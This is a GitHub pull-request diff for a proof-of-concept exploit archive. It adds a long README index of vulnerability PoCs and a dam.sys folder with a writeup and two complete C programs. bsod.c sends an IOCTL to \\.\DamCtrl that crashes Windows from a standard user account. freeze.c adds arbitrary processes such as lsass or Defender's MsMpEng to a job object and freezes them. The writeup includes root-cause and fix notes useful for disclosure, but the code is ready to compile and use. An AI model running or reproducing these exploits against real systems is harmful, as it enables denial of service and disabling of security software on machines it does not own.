Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
77 commits
Select commit Hold shift + click to select a range
e092962
Update README.md
bikini Jun 26, 2026
da77380
Update README.md
bikini Jun 26, 2026
380e5b9
Add FFmpeg RASC DLTA calc PoC
bikini Jun 26, 2026
a5a6115
Update README.md
bikini Jun 27, 2026
554980b
Update README.md
bikini Jun 27, 2026
8e0700c
Update README.md
bikini Jun 27, 2026
a41de62
Create librenms-ssti-rce.md
Unrealisedd Jun 27, 2026
8251c7c
Fix c-ares PoC trace flag handling
bikini Jun 27, 2026
0e57a00
Broaden c-ares PoC allocation shaping
bikini Jun 27, 2026
56b2a6f
Drain c-ares loop after control callback
bikini Jun 27, 2026
2449407
Make c-ares PoC search retry deterministic
bikini Jun 27, 2026
b9a5565
Update README.md
bikini Jun 27, 2026
e72afcd
Update README.md
bikini Jun 27, 2026
36c21f7
Update README.md
bikini Jun 27, 2026
11793c4
Update README.md
bikini Jun 27, 2026
b42a7b8
Add security vulnerability report for Discord Desktop
Unrealisedd Jun 28, 2026
55aaa8d
Fix title formatting in Wazuh stack overflow report
Unrealisedd Jun 28, 2026
e177bae
Add files via upload
Unrealisedd Jun 28, 2026
2b6ce99
Add SSRF protection bypass report for Nextcloud
Unrealisedd Jun 28, 2026
5eac8bb
Create xxe-file-read-and-ssrf.md
Unrealisedd Jun 28, 2026
add74cb
Add documentation for SSRF vulnerability in n8n OAuth2
Unrealisedd Jun 28, 2026
6e0675e
Add vulnerability report for Fluent Bit collectd parser
Unrealisedd Jun 28, 2026
898953a
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
ea13c84
Update README.md
bikini Jun 28, 2026
8d1d29b
Add portable RASC DLTA calc PoC helper
bikini Jun 28, 2026
ff4ed29
Update README.md
bikini Jun 28, 2026
c438bda
Create cves.md
bikini Jun 28, 2026
c700676
Update cves.md
bikini Jun 28, 2026
d2fc9ec
Update cves.md
bikini Jun 28, 2026
f00fa9c
Update cves.md
bikini Jun 28, 2026
8db8b4c
Update cves.md
bikini Jun 28, 2026
75dec43
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
eece0aa
Document kernel vulnerabilities in ovpn-dco-win
Unrealisedd Jun 28, 2026
77cc5de
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
5359450
add ovpn-dco UAF poc
Unrealisedd Jun 28, 2026
01abfc3
update ovpn-dco readme
Unrealisedd Jun 28, 2026
25db9ad
Update README.md
bikini Jun 29, 2026
a2047b5
Update README.md
bikini Jun 29, 2026
6a841ec
ovpn-dco: crash PoC for CNG key UAF in V1 rekey handler
Unrealisedd Jun 29, 2026
abfa3ad
StorSvc DLL hijack LPE: LoadLibraryW without LOAD_LIBRARY_SEARCH_SYST…
Unrealisedd Jun 29, 2026
e7f9e89
dam.sys: 3 kernel bugs from standard user (BSOD + confused deputy + D…
Unrealisedd Jun 29, 2026
575c81b
Merge branch 'bikini:main' into main
Unrealisedd Jun 29, 2026
e334b7f
SEB service auth bypass: unauthenticated WCF connection to SYSTEM ser…
Unrealisedd Jun 29, 2026
cb5e514
CVE-2026-45498 patch bypass: FILE_SHARE_READ locks Defender sigs on p…
Unrealisedd Jun 29, 2026
7229336
defender lock bypass: scan all 3 dirs, clean up poc + writeup
Unrealisedd Jun 29, 2026
8aef451
Update README with project origin and author insights
Unrealisedd Jun 29, 2026
3ee4f92
README: add attribution for original work, separate my additions
Unrealisedd Jun 29, 2026
0185b95
Update README.md
bikini Jul 1, 2026
83cd625
Add July direct exploitarium entries
bikini Jul 1, 2026
02e9a1c
Update README.md
bikini Jul 1, 2026
e095662
Merge branch 'bikini:main' into main
Unrealisedd Jul 1, 2026
4ce4a0f
Add Ladybird WebAssembly ESM host function RCE PoC
bikini Jul 1, 2026
7a28951
Add NodeBB ActivityPub attributedTo spoof PoC
bikini Jul 1, 2026
b5f8efb
Add Pillow ImageCms output mode PoC
bikini Jul 1, 2026
21393d5
Add QEMU CXL Type-3 mailbox escape PoC
bikini Jul 1, 2026
cbeb27f
Add Gogs admin CSRF Git hook RCE PoC
bikini Jul 1, 2026
a8fb18d
Overwolf Updater LPE: standard user to SYSTEM via forged Authenticode…
Unrealisedd Jul 1, 2026
a6bf6ec
Merge branch 'bikini:main' into main
Unrealisedd Jul 1, 2026
780ae35
add spacedesk service DACL LPE poc
Unrealisedd Jul 1, 2026
d46778c
Update cves.md
bikini Jul 2, 2026
06f4b17
Merge branch 'bikini:main' into main
Unrealisedd Jul 2, 2026
24b3803
Add Woodpecker CI YAML injection + RetroArch CHD heap overflow
Unrealisedd Jul 2, 2026
2a5ef6b
Add missing entries to My Additions table (overwolf, spacedesk)
Unrealisedd Jul 2, 2026
d8d3cbb
SEB service: upgrade to Critical — confirmed RCE as SYSTEM via log in…
Unrealisedd Jul 2, 2026
7e4f722
Fix README for upstream PR — remove fork-specific language
Unrealisedd Jul 2, 2026
f6db4bb
Add Nextcloud federated share bearer token PoC
bikini Jul 3, 2026
77b65f9
Add Discourse scoped API key route bypass PoC
bikini Jul 3, 2026
04f8471
Add Redis vector set RCE PoC
bikini Jul 3, 2026
35da066
Merge branch 'bikini:main' into main
Unrealisedd Jul 3, 2026
302d2d2
Add PostgreSQL RI implicit cast PoC
bikini Jul 4, 2026
8973d60
Merge branch 'bikini:main' into main
Unrealisedd Jul 4, 2026
f85d9a3
Update README.md
Unrealisedd Jul 6, 2026
f7c3a8a
Add Windows Defender NTLM coercion PoC
Unrealisedd Jul 6, 2026
ff1fa8f
Update defender NTLM coercion writeup
Unrealisedd Jul 9, 2026
53afbcc
Merge branch 'main' into main
Unrealisedd Jul 28, 2026
763a676
Add files via upload
Unrealisedd Jul 30, 2026
fa7cb45
Add entry for unauthenticated RCE in keep system
Unrealisedd Jul 30, 2026
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
36 changes: 36 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,14 @@
https://discord.gg/WytKH65ZR join up for research, help, documentation, and more useful information for those interested.

# News/Contact

Credit for the objdump finding goes to someone who beat me to it (and has a better PoC): https://github.com/4D4J/objdump-Out-Of-Bounds-write

New drops today ;) Biggest thing yet (DELAYED, I PROMISE THE WAIT WILL BE WORTH IT! After this, you guys will *usually* get one new PoC a day)

I've also noticed a surprising amount of "security researchers" aren't able to adjust the PoC to work in their environment. I will broaden the PoCs for those select few...

If you wish to collaborate/discuss with me, contact me on discord @ashdfrkl
# Statement

This repo was incomplete when published.
Expand All @@ -22,6 +33,30 @@ A consolidated archive of my public proof-of-concept and vulnerability research

Most folders contain one of my former standalone PoC repos, preserved with its original README and tracked files. New research entries are added directly here as self-contained folders.

## Contributed Research (by [Unrealisedd](https://github.com/Unrealisedd))

The following entries were contributed via PR:

| Folder | Description |
| --- | --- |
| `openvpn-UAF-BYOVD` | ovpn-dco-win kernel driver CNG key UAF + crash PoC |
| `storsvc-dll-hijack-lpe` | StorSvc `LoadLibraryW("SprintCSP.dll")` without `LOAD_LIBRARY_SEARCH_SYSTEM32` |
| `dam-sys-kernel-bugs` | dam.sys: 3 kernel bugs from standard user (BSOD + confused deputy + Defender freeze) |
| `seb-service-auth-bypass-lpe` | Safe Exam Browser SYSTEM service auth bypass → RCE as SYSTEM via log injection |
| `defender-signature-lock-bypass` | CVE-2026-45498 patch bypass: `FILE_SHARE_READ` locks Defender signatures |
| `discord` | Discord Desktop RCE attack paths |
| `wazuh` | Wazuh stack BOF + SCA DoS |
| `nextcloud` | XXE file read/SSRF + SSRF protection bypass |
| `n8n-ssrf-via-oauth2` | SSRF via OAuth2 callback in n8n |
| `fluentbit-infinite-dos` | Fluent Bit collectd parser unauth DoS loop |
| `librenms-RCE-chain` | LibreNMS SSTI to RCE chain |
| `overwolf-updater-lpe-poc` | Overwolf Updater forged Authenticode cert + insecure service DACL → SYSTEM LPE |
| `spacedesk-service-lpe-poc` | spacedesk service Everyone full-control DACL → SYSTEM in 3 commands |
| `woodpecker-yaml-cr-injection` | Woodpecker CI pipeline RCE via `\r` YAML injection bypass |
| `retroarch-chd-map-heap-overflow` | RetroArch libchdr integer overflow → heap OOB write on 32-bit |
| `defender-ntlm-coercion-poc` | Windows Defender NTLM coercion: standard user forces SYSTEM credential leak via UNC scan |
| `‎keep-provider-invoke-unauth-rce-poc` | Unauthenticated RCE chain in the keep monitoring system |

## Contents

| Folder | Source | Tracked entries |
Expand All @@ -30,6 +65,7 @@ Most folders contain one of my former standalone PoC repos, preserved with its o
| `anydesk-printer-com-impersonation-poc` | `7491303301093b2d40bee9dadf6b38f757ce78e0` | 4 |
| `c-ares-tcp-uaf-calc-poc` | direct entry, June 24, 2026 | 7 |
| `curl-smtp-expn-recipient-crlf-injection` | direct entry, July 1, 2026 | 3 |
| `defender-ntlm-coercion-poc` | direct entry, July 6, 2026 | 3 |
| `discord-activity-stock-client-rce-poc` | direct entry, July 14, 2026 | 8 |
| `discourse-scoped-api-key-preauth-bypass` | direct entry, July 3, 2026 | 3 |
| `docker-cp-copyout-destination-escape` | `d1367b1381736d7f961ac808ce88d4e24a633adc` | 5 |
Expand Down
149 changes: 149 additions & 0 deletions dam-sys-kernel-bugs/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,149 @@
# dam.sys — Kernel Bugs from Standard User (BSOD + Confused Deputy + Defender Freeze)

Three vulnerabilities in the Windows Desktop Activity Moderator kernel driver (`dam.sys`), all reachable from a standard (non-admin) user via `\\.\DamCtrl`. The device is accessible to Everyone despite operating on arbitrary processes in kernel context.

## Status

Confirmed on Windows 11 Home 25H2 (build 26200.8457), dam.sys 10.0.26100.8328.

## Files

```text
.
|-- README.md
|-- bsod.c NULL pointer deref crash PoC
`-- freeze.c confused deputy + process freeze PoC
```

## Build

```
cl /O2 bsod.c
cl /O2 freeze.c
```

## Finding 1: Kernel NULL Pointer Dereference (BSOD)

IOCTL `0x226014` (SetPolicy) takes a user-supplied PID and eventually dispatches to `DampExemptCheckCallbackRoutine`. When the target process's session ID has no entry in `DampUserContextList`, the linked list lookup falls through with `rdi = NULL` and the code unconditionally dereferences it:

```asm
; No matching session context found:
xor ebx, ebx ; rbx = 0 (NULL)
mov rdi, rbx ; rdi = 0 (NULL)
mov rdx, [rdi] ; CRASH — reads from 0x0000000000000000
mov rcx, r15
call nt!ZwIsProcessInJob ; never reached
```

### Crash Evidence

```
BugCheck: SYSTEM_SERVICE_EXCEPTION (0x3B)
Exception: STATUS_ACCESS_VIOLATION (0xC0000005)
Faulting: dam!DampExemptCheckCallbackRoutine+0x17e
Stack:
dam!DampExemptCheckCallbackRoutine+0x17e <- NULL deref
nt!ExNotifyCallback+0x103
dam!DampNotificationGroupGet+0x144
dam!DampIoDispatch+0x4a8 <- IOCTL handler
nt!NtDeviceIoControlFile+0x5e <- our DeviceIoControl
```

Registers at crash: `rdi=0x0000000000000000`, `r13=0xFFFFFFFF` (invalid session ID).

### Run

```
bsod.exe --confirm
```

Crashes the machine. Use a VM.

---

## Finding 2: Confused Deputy — Add Any Process to DAM Job Object

IOCTL `0x22A01C` takes an 8-byte PID input and calls `PsLookupProcessByProcessId` followed by `DampAddProcessToJobObject` — with **no access check** on whether the calling user should be able to manipulate the target process. The kernel uses its own Ring 0 privileges to add any process to DAM's internal job objects on behalf of an unprivileged user.

```c
// dam.sys IOCTL 0x22A01C handler (decompiled)
iVar11 = PsLookupProcessByProcessId((uint)*puVar5, &local_98);
if (-1 < iVar11) {
uVar13 = PsGetProcessImageFileName(local_98); // info leak
iVar11 = PsQueryProcessCommandLine(local_98, 0); // info leak
iVar12 = PsGetProcessSessionId(local_98);
DampAddProcessToJobObject(local_98, ...); // NO ACCESS CHECK
}
```

### Confirmed

```
Testing with lsass.exe PID 1804...
Result: SUCCESS
[!!!] Standard user added lsass.exe to DAM job object
```

### Side Effect: Information Disclosure

The handler also calls `PsGetProcessImageFileName` and `PsQueryProcessCommandLine` for the target PID — a standard user can read the image name and full command line (including arguments that may contain secrets) of any process.

### Run

```
freeze.exe lsass.exe
```

Adds lsass to DAM's job object without freezing. Confirms the confused deputy.

---

## Finding 3: Security Feature Bypass — Freeze Defender

IOCTL `0x22A008` calls `DamSetState` to modify freeze flags, which triggers `DampFreezeUserSessions` → `ZwSetInformationJobObject` with `JobObjectFreezeInformation` (class 0x12), suspending all threads in DAM's job objects.

Combined with Finding 2:

1. Add all security processes (MsMpEng.exe, Defender services, Event Log, etc.) to DAM jobs via IOCTL `0x22A01C`
2. Trigger freeze via IOCTL `0x22A008`
3. Defender management plane becomes unresponsive — can't report status, receive config, or respond to queries

```c
// DamSetState (decompiled)
DampFreezeWorkerAcquireLockExclusive(0x14000d400);
uVar3 = (*(int *)(param_1 + 0xc) == 2) ? 2 : 0; // freeze flag
uVar2 = (*(int *)(param_1 + 0xc) == 3) ? 4 : 0; // deep freeze flag
DAT_14000d47c = uVar4 | uVar2 | uVar3 | (DAT_14000d47c & 0xffffffb8);
DampFreezeWorkerUpdatePostAndUnlock(&DAT_14000d400);
// -> DampFreezeUserSessions -> ZwSetInformationJobObject(JobObjectFreezeInformation)
```

### Run

```
freeze.exe MsMpEng.exe --freeze
```

Actually freezes Defender. Don't run outside a VM.

---

## Root Cause Summary

| IOCTL | Bug | CWE | Impact |
| --- | --- | --- | --- |
| 0x226014 | NULL deref after failed session lookup | CWE-476 | BSOD from standard user |
| 0x22A01C | No access check on target PID | CWE-441, CWE-862 | Confused deputy, add any process to job |
| 0x22A008 | No access check on freeze control | CWE-862 | Freeze any process in DAM jobs |

All three share the same underlying issue: `\\.\DamCtrl` is accessible to standard users, and the IOCTL handlers operate on arbitrary processes using kernel privileges without verifying caller authorization.

## Fix

1. **NULL check**: validate that the `DampUserContextList` lookup returned non-NULL before dereferencing
2. **Access checks**: verify the caller has appropriate rights on the target PID before calling `PsLookupProcessByProcessId` / `DampAddProcessToJobObject`
3. **Device DACL**: restrict `\\.\DamCtrl` to admin-only — standard users have no legitimate need for direct DAM driver interaction

## Responsible Use

Run these PoCs only on systems you own or are explicitly authorized to test. The BSOD PoC crashes the machine. The freeze PoC can render security services unresponsive. Use a VM.
57 changes: 57 additions & 0 deletions dam-sys-kernel-bugs/bsod.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
/*
* bsod.c — dam.sys kernel NULL pointer deref (BSOD from standard user)
*
* IOCTL 0x226014 (SetPolicy) triggers DampExemptCheckCallbackRoutine
* which dereferences a NULL pointer when no DAM session context exists
* for the target process's session ID.
*
* BugCheck: SYSTEM_SERVICE_EXCEPTION (0x3B)
* Faulting: dam!DampExemptCheckCallbackRoutine+0x17e
* mov rdx, [rdi] ; rdi = 0x0000000000000000
*
* build: cl /O2 bsod.c
* run: bsod.exe --confirm [PID]
*
* WARNING: THIS WILL BSOD YOUR MACHINE. USE A VM.
*/

#include <windows.h>
#include <stdio.h>

#define IOCTL_DAM_SET_POLICY 0x226014

int main(int argc, char *argv[]) {
printf("=== dam.sys kernel DoS PoC ===\n\n");

if (argc < 2 || strcmp(argv[1], "--confirm") != 0) {
printf("Usage: %s --confirm [PID]\n", argv[0]);
printf("WARNING: This causes a Blue Screen of Death.\n");
printf("No admin required — works from standard user.\n");
return 1;
}

DWORD pid = (argc > 2) ? atoi(argv[2]) : 4;
printf("[*] target PID: %u\n", pid);

HANDLE h = CreateFileW(L"\\\\.\\DamCtrl", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, 0, NULL);
if (h == INVALID_HANDLE_VALUE) {
printf("[-] can't open \\\\.\\DamCtrl: error %u\n", GetLastError());
return 1;
}
printf("[+] opened DamCtrl\n");

printf("[!] sending IOCTL 0x226014 — expect BSOD\n");

BYTE buf[16] = {0};
*(DWORD *)buf = pid;
*(DWORD *)(buf + 4) = 1;
DWORD ret;
DeviceIoControl(h, IOCTL_DAM_SET_POLICY, buf, sizeof(buf),
buf, sizeof(buf), &ret, NULL);

printf("[?] if you see this, try a different PID\n");
CloseHandle(h);
return 0;
}
102 changes: 102 additions & 0 deletions dam-sys-kernel-bugs/freeze.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,102 @@
/*
* freeze.c — dam.sys confused deputy + process freeze PoC
*
* Step 1: IOCTL 0x22A01C adds any process (by PID) to DAM's internal
* job objects. The kernel driver calls PsLookupProcessByProcessId
* and ZwAssignProcessToJobObject with NO access check on the
* target — a standard user can add lsass.exe, csrss.exe, etc.
*
* Step 2: IOCTL 0x22A008 triggers DamSetState to freeze all processes
* in DAM's job objects via ZwSetInformationJobObject with
* JobObjectFreezeInformation (class 0x12).
*
* build: cl /O2 freeze.c
* run: freeze.exe <process_name> [--freeze]
*
* WARNING: --freeze will actually freeze the target process.
* This can freeze lsass, csrss, Defender, etc. USE A VM.
*/

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

#define IOCTL_DAM_ADD_TO_JOB 0x22A01C
#define IOCTL_DAM_SET_STATE 0x22A008

static DWORD find_pid(const char *name) {
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snap == INVALID_HANDLE_VALUE) return 0;
PROCESSENTRY32 pe = {.dwSize = sizeof(pe)};
if (Process32First(snap, &pe)) {
do {
if (_stricmp(pe.szExeFile, name) == 0) {
CloseHandle(snap);
return pe.th32ProcessID;
}
} while (Process32Next(snap, &pe));
}
CloseHandle(snap);
return 0;
}

int main(int argc, char *argv[]) {
printf("=== dam.sys confused deputy + freeze PoC ===\n\n");

if (argc < 2) {
printf("Usage: %s <process_name> [--freeze]\n\n", argv[0]);
printf(" Adds target process to DAM's job object (confused deputy).\n");
printf(" --freeze: also triggers freeze via IOCTL 0x22A008 (DANGEROUS)\n");
printf("\n Examples:\n");
printf(" %s lsass.exe (add lsass to DAM job, no freeze)\n", argv[0]);
printf(" %s MsMpEng.exe --freeze (freeze Defender)\n", argv[0]);
return 1;
}

int do_freeze = (argc > 2 && strcmp(argv[2], "--freeze") == 0);

DWORD pid = find_pid(argv[1]);
if (!pid) {
printf("[-] process '%s' not found\n", argv[1]);
return 1;
}
printf("[*] target: %s (PID %u)\n", argv[1], pid);

HANDLE h = CreateFileW(L"\\\\.\\DamCtrl", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, 0, NULL);
if (h == INVALID_HANDLE_VALUE) {
printf("[-] can't open DamCtrl: error %u\n", GetLastError());
return 1;
}
printf("[+] opened DamCtrl\n");

ULONGLONG pid_input = (ULONGLONG)pid;
DWORD ret;
BOOL ok = DeviceIoControl(h, IOCTL_DAM_ADD_TO_JOB, &pid_input, 8,
NULL, 0, &ret, NULL);
printf("[%c] add to job: %s (GetLastError=%u)\n",
ok ? '+' : '-', ok ? "SUCCESS" : "FAILED", GetLastError());

if (!ok) {
CloseHandle(h);
return 1;
}

if (do_freeze) {
printf("[!] triggering freeze...\n");
BYTE state[16] = {0};
*(DWORD *)(state + 8) = 2;
*(DWORD *)(state + 12) = 2;

ok = DeviceIoControl(h, IOCTL_DAM_SET_STATE, state, 16,
NULL, 0, &ret, NULL);
printf("[%c] set state: %s (GetLastError=%u)\n",
ok ? '+' : '-', ok ? "SUCCESS" : "FAILED", GetLastError());
} else {
printf("[*] process added to DAM job. pass --freeze to actually freeze it.\n");
}

CloseHandle(h);
return 0;
}
Loading